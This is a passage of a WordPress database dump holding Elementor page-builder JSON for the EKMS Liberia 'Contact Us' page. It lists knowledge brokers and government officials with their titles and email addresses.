transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19764,2891,'_elementor_edit_mode','builder'),(19765,2891,'_elementor_template_type','wp-page'),(19766,2891,'_elementor_version','2.7.5'),(19767,2891,'_wp_page_template','default'),(19768,2891,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\"